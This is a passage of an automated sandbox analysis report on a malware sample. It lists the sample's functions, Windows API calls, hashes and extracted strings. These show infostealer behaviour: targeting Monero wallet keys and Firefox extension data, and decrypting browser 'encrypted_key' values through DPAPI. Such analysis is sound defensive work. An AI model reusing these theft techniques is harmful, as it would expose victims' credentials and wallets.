                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: fd9858497478de8a9850613112a35d4541a1b817431f52d360a55a18e1abcfa0
                    • Instruction ID: 281958693eababd53c9985fb9e9dd1f9382094847893e560857721093668acb6
                    • Opcode Fuzzy Hash: fd9858497478de8a9850613112a35d4541a1b817431f52d360a55a18e1abcfa0
                    • Instruction Fuzzy Hash: 6D312BB1801218AEEB58EB90DC96BDEB779BF44300F404199F20966191DF746B89CF6A
                    Function 006487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00650E28,00000000,?), ref: 0064882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00648836
                    • wsprintfA.USER32 ref: 00648850
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: 1b6c59c4688435af31ee800e7ddeeaa173f671aecaa2cc08d475bde1ff518d92
                    • Instruction ID: 1abfe6843f677d2f3a914621d871404c646e0a001ba1304d31c8c3b532e4d468
                    • Opcode Fuzzy Hash: 1b6c59c4688435af31ee800e7ddeeaa173f671aecaa2cc08d475bde1ff518d92
                    • Instruction Fuzzy Hash: F12172B1E44204AFDB08DFD4DD49FAEBBB9FB48701F104159F609A7284C7799900CBA2
                    Function 00648D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0064951E,00000000), ref: 00648D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00648D62
                    • wsprintfW.USER32 ref: 00648D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: a25617e58b5b05407188335fd0c4c3f545a6659da9c3061f39243b067efeab49
                    • Instruction ID: e31d9e8e81240df0d97e062d1345a30fc74df6238d7e2c0eba08520ab3108a78
                    • Opcode Fuzzy Hash: a25617e58b5b05407188335fd0c4c3f545a6659da9c3061f39243b067efeab49
                    • Instruction Fuzzy Hash: 43E08CB0A40208BBDB08DB94DC0EE6D77BCFB84702F0400A4FD0D87280DA71DE408BA2
                    Function 0063A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0063A2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 0063A3FF
                    • lstrlen.KERNEL32(00000000), ref: 0063A6BC
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 0063A743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 8b965d01f272f1de6fb4a4a551615ee1f1f0047e241f8a6d1f12c0597f7526eb
                    • Instruction ID: 7f83449a0e803c907e4ad6bfaa57fa6881e1b7e9c5a40fa007201f597ab5c66b
                    • Opcode Fuzzy Hash: 8b965d01f272f1de6fb4a4a551615ee1f1f0047e241f8a6d1f12c0597f7526eb
                    • Instruction Fuzzy Hash: 8DE1ED72850108AAEB48EBE4DC96EEE733AFF54304F50815DF51676091EF306A49CB6A
                    Function 0063D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0063D481
                    • lstrlen.KERNEL32(00000000), ref: 0063D698
                    • lstrlen.KERNEL32(00000000), ref: 0063D6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 0063D72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 6efcf6b8c447623874603fbdf49eb4e1a4ee7e716074604aefb197d60a847fc2
                    • Instruction ID: b0d0dc033fa269b3461bfef3027fe79bb4efa09fde6071cf0a3cc854794a1d0b
                    • Opcode Fuzzy Hash: 6efcf6b8c447623874603fbdf49eb4e1a4ee7e716074604aefb197d60a847fc2
                    • Instruction Fuzzy Hash: 89910172850108AAEB48FBE0DC96DEE733AFF54304F51456CF507A6091EF346A49CB6A
                    Function 0063D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0063D801
                    • lstrlen.KERNEL32(00000000), ref: 0063D99F
                    • lstrlen.KERNEL32(00000000), ref: 0063D9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 0063DA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 702462ede763423fafe4d52fa792dbd16fd7ad7d8b08bc7fb2f07828d7e96c7c
                    • Instruction ID: 5959b264d08407b8f15bbf15420adb6956d90cad42ee2810ce7c355b212ce356
                    • Opcode Fuzzy Hash: 702462ede763423fafe4d52fa792dbd16fd7ad7d8b08bc7fb2f07828d7e96c7c
                    • Instruction Fuzzy Hash: 10810072950104AAEB48FBE0DC96EEE733AFF54304F51452CF406A6091EF346A49CBA6
                    Function 0063F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00651580,00650D92), ref: 0063F54C
                    • lstrlen.KERNEL32(00000000), ref: 0063F56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: e699929599485fc60242b6d28880d44a6c7b37cd3b1d2de8450ded51cc72f3ac
                    • Instruction ID: 751f91f26d3546047b748572e1a66ba990918fc2232dca2fa5161e5f8145d2ff
                    • Opcode Fuzzy Hash: e699929599485fc60242b6d28880d44a6c7b37cd3b1d2de8450ded51cc72f3ac
                    • Instruction Fuzzy Hash: 33513075D50108BAEB54FBE0DC96DED733AEF54300F40852CF806A7191EE34AA09CBA6
                    Function 00643560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: 665dc1aa99e7ae3a1842d92b0c208709a9b13f7828a7050d556f188d4d5d12c7
                    • Instruction ID: 6fac10ab2a284ce1db25d8c110793f3f86af2b6bee89ec286a0e2cda486d4c0a
                    • Opcode Fuzzy Hash: 665dc1aa99e7ae3a1842d92b0c208709a9b13f7828a7050d556f188d4d5d12c7
                    • Instruction Fuzzy Hash: 83416CB5D10209AFDB04EFE4D845AEEB776BF54304F008018E81676391EB74AA49CFA6
                    Function 00639CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00639D39
                      • Part of subcall function 00639AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639AEF
                      • Part of subcall function 00639AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00634EEE,00000000,?), ref: 00639B01
                      • Part of subcall function 00639AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639B2A
                      • Part of subcall function 00639AC0: LocalFree.KERNEL32(?,?,?,?,00634EEE,00000000,?), ref: 00639B3F
                      • Part of subcall function 00639B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00639B84
                      • Part of subcall function 00639B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00639BA3
                      • Part of subcall function 00639B60: LocalFree.KERNEL32(?), ref: 00639BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: 5a57b5532348a03af21992030c31357deeb9031e531b3f5491ed5499af62218a
                    • Instruction ID: 5087af1566c39ee9e07b541c9321a543bfbd7ef59d92ffd713031116c5e1d63d
                    • Opcode Fuzzy Hash: 5a57b5532348a03af21992030c31357deeb9031e531b3f5491ed5499af62218a
                    • Instruction Fuzzy Hash: 93313EB6D10209ABCB04DBE4DC86AEFB7BAAF48304F144518E905A7241EB749A44CFA5
                    Function 006494D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 006494EB
                      • Part of subcall function 00648D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0064951E,00000000), ref: 00648D5B
                      • Part of subcall function 00648D50: RtlAllocateHeap.NTDLL(00000000), ref: 00648D62
                      • Part of subcall function 00648D50: wsprintfW.USER32 ref: 00648D78
                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006495AB
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 006495C9
                    • CloseHandle.KERNEL32(00000000), ref: 006495D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
